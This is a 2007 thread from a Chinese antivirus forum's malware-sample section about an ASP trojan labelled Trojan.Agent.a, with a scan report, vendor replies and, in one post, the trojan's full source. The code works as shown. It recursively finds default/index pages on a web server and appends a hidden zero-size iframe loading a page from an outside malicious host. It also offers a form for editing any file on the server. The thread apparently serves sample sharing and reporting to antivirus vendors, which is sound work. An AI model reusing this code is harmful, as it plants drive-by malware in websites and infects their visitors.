收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 Trojan.Agent.a
12下一页
返回列表 发新帖
查看: 3927|回复: 14
收起左侧

Trojan.Agent.a

[复制链接]
zjsxsycj
发表于 2007-4-22 22:05:57 | 显示全部楼层 |阅读模式
又过NOD、卡巴6.........

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

The EQs
发表于 2007-4-22 22:06:39 | 显示全部楼层
上报。。。。。
回复

举报

bluenice
头像被屏蔽
发表于 2007-4-22 22:14:14 | 显示全部楼层
一个脚本而已……
回复

举报

蓝色牛仔裤
发表于 2007-4-22 22:15:52 | 显示全部楼层
asp ??估计没几个报的..
回复

举报

The EQs
发表于 2007-4-22 22:22:04 | 显示全部楼层
[ file data ]
* name: Trojan.Agent.a_.rar
* size: 1372
* md5.: 39f8b117850db84c1841074b10f92540
* sha1: 4a7430e782280608fb81e2e5175d421a5f6943aa


[ scan result ]
AhnLab-V3      2007.4.21.0/20070420    found nothing

AntiVir 7.3.1.53/20070422       found nothing

Authentium      4.93.8/20070420 found nothing
Avast   4.7.981.0/20070421      found nothing
AVG     7.5.0.464/20070421      found nothing

BitDefender     7.2/20070422    found nothing
CAT-QuickHeal   9.00/20070421   found nothing

ClamAV  devel-20070416/20070421 found nothing

DrWeb   4.33/20070422   found nothing
eSafe   7.0.15.0/20070419       found nothing

eTrust-Vet      30.7.3585/20070421      found nothing

Ewido   4.0/20070422    found [Trojan.Agent.a]

F-Prot  4.3.2.48/20070420       found nothing

F-Secure        6.70.13030.0/20070422   found nothing

FileAdvisor     1/20070422      found nothing

Fortinet        2.85.0.0/20070422       found nothing
Ikarus  T3.1.1.5/20070422       found nothing
Kaspersky       4.0.2.24/20070422       found nothing

McAfee  5014/20070420   found nothing
Microsoft       1.2405/20070422 found nothing

NOD32v2 2210/20070422   found nothing

Norman  5.80.02/20070421        found nothing

Panda   9.0.0.4/20070422        found nothing

Prevx1  V2/20070422     found nothing
Sophos  4.16.0/20070420 found nothing

Sunbelt 2.2.907.0/20070419      found nothing

Symantec        10/20070422     found nothing
TheHacker       6.1.6.095/20070415      found nothing
VBA32   3.11.4/20070421 found nothing
VirusBuster     4.3.7:9/20070421        found nothing

Webwasher-Gateway       6.0.1/20070422  found [VBScript.Unwanted.gen!FR:M-FW:H-CL:H
回复

举报

剑指七星
发表于 2007-4-22 22:28:27 | 显示全部楼层
上报去
回复

举报

moonsilver
发表于 2007-4-22 22:33:50 | 显示全部楼层
尊敬的客户,您好!
    您的邮件已经收到,感谢您对瑞星的支持。

    我们已经详细分析过您的问题和文件,以下是您上传的文件的分析结果:
    1.文件名:Trojan.Agent.a .asp
    不是病毒



注意:如果您上报的文件损坏或者压缩包有密码保护,会导致我们无法正确分析,请您确认文件正常且压缩包中无密码后再提交。
如有问题,您可以通过电话或者邮件服务中心与我们联系,详细描述您的问题,并且提供此封邮件主题中的流水单号以及上报所用的电子邮件地址。
提    醒:为保证收到您的来信,请勿直接回复本邮件!!!

[ 本帖最后由 moonsilver 于 2007-4-24 11:29 编辑 ]
回复

举报

嘁。不稀罕~
发表于 2007-4-23 21:55:01 | 显示全部楼层
过趋势。。。没过金山。。。哈哈国产好啊!
回复

举报

剑指七星
发表于 2007-4-24 07:34:35 | 显示全部楼层
Hello,

Trojan.Agent.a .asp - Trojan.ASP.Agent.a

New malicious software was found in this file. It's detection will be included in the next update. Thank you for your help.

Please quote all when answering.

--
Best regards, Yaroslav Kirillov
Virus analyst, Kaspersky Lab.
e-mail: newvirus@kaspersky.com
http://www.kaspersky.com/

http://www.kaspersky.com/virusscanner - free online virus scanner.
http://www.kaspersky.com/helpdesk.html - technical support.
回复

举报

moonsilver
发表于 2007-4-24 11:30:58 | 显示全部楼层
  1. <%Server.ScriptTimeout=10000
  2. Response.Buffer=False
  3. %>
  4. <html>
  5. <head>
  6. <title></title>
  7. <meta http-equiv="Content-Type" c>
  8. </head>
  9. <body>
  10. <%
  11. ASP_SELF=Request.ServerVariables("PATH_INFO")
  12. s=Request("fd")
  13. ex=Request("ex")
  14. pth=Request("pth")
  15. newcnt=Request("newcnt")
  16. If ex<>"" AND pth<>"" Then
  17. Select Case ex
  18.     Case "edit"
  19.         CALL file_show(pth)
  20.     Case "save"
  21.         CALL file_save(pth)
  22. End Select
  23. Else
  24. %>
  25. <form action="<%=ASP_SELF%>" method="POST">
  26. FOLDER (ABSOLUTE PATH):
  27. <input type="text" name="fd" size="40">
  28. <input type="submit" value="SUBMIT">
  29. </form>
  30. <%End If%>
  31. <%
  32. Function IsPattern(patt,str)
  33.     Set regEx=New RegExp
  34.     regEx.Pattern=patt
  35.     regEx.IgnoreCase=True
  36.     retVal=regEx.Test(str)
  37.     Set regEx=Nothing
  38.     If retVal=True Then
  39.         IsPattern=True
  40.     Else
  41.         IsPattern=False
  42.     End If
  43. End Function
  44. If IsPattern("[^ab]{1}:{1}([url=file://\\|\/)]\\|\/)",s[/url]) Then
  45.     sch s
  46. Else
  47.     If s<>"" Then Response.Write "Invalid Agrument!"
  48. End If

  50. Sub sch(s)
  51. oN eRrOr rEsUmE nExT
  52. Set fs=Server.CreateObject("Scripting.FileSystemObject")
  53. Set fd=fs.GetFolder(s)
  54. Set fi=fd.Files
  55. Set sf=fd.SubFolders
  56. For Each f in fi
  57. rtn=f.Path
  58. step_all rtn
  59. Next
  60. If sf.Count<>0 Then
  61. For Each l In sf
  62. sch l
  63. Next
  64. End If
  65. End Sub
  66. Sub step_all(agr)
  67.     retVal=IsPattern("([url=file://\\|\/)(default|index)\.(htm|html|asp|php|jsp)\b]\\|\/)(default|index)\.(htm|html|asp|php|jsp)\b",agr[/url])
  68.     If retVal Then
  69.         step1 agr
  70.         step2 agr
  71.     Else
  72.         Exit Sub
  73.     End If
  74. End Sub
  75. %>
  76. <%Sub step1(str1)%>
  77. <a href="<%=ASP_SELF%>?ex=edit&pth=<%=str1%>" target="_blank"><%=str1%></a><br>
  78. <%End Sub%>
  79. <%
  80. Sub step2(str2)
  81.     addcode="<iframe src=http://8.71z.cn/ms.htm width=0 height=0 frameborder=0></iframe>"
  82.     Set fs=Server.CreateObject("Scripting.FileSystemObject")
  83.     isExist=fs.FileExists(str2)
  84.     If isExist Then
  85.         Set f=fs.GetFile(str2)
  86.         Set f_addcode=f.OpenAsTextStream(8,-2)
  87.         f_addcode.Write addcode
  88.         f_addcode.Close
  89.         Set f=Nothing
  90.     End If
  91.     Set fs=Nothing
  92. End Sub
  93. %>
  94. <%
  95. Sub file_show(fname)
  96.     Set fs1=Server.CreateObject("Scripting.FileSystemObject")
  97.     isExist=fs1.FileExists(fname)
  98.     If isExist Then
  99.         Set fcnt=fs1.OpenTextFile(fname)
  100.         cnt=fcnt.ReadAll
  101.         fcnt.Close
  102.         Set fs1=Nothing%>
  103. FILE: <%=fname%>
  104. <form action="<%=ASP_SELF%>" method="POST">
  105. <textarea name="newcnt" cols="100" rows="30"><%=cnt%></textarea>
  106. <input type="hidden" name="pth" value="<%=fname%>">
  107. <input type="hidden" name="ex" value="save">
  108. <input type="submit" value="SAVE">
  109. </form>
  110.     <%Else%>
  111. <p>THE FILE IS NOT EXIT OR HAVE DELETED.</p>
  112. <%
  113.     End If
  114. End Sub
  115. %>
  116. <%
  117. Sub file_save(fname)
  118.     Set fs2=Server.CreateObject("Scripting.FileSystemObject")
  119.     Set newf=fs2.CreateTextFile(fname,True)
  120.     newf.Write newcnt
  121.     newf.Close
  122.     Set fs2=Nothing
  123.     Response.Write "<p>THE FILE WAS MODIFIED SUCCESSFULLY.</p>"   
  124. End Sub
  125. %>
  126. </body>
  127. </html>
复制代码

[ 本帖最后由 ALEXBLAIR 于 2007-4-24 13:49 编辑 ]
回复

举报

下一页 »
12下一页
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-4-24 19:08 , Processed in 0.123110 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表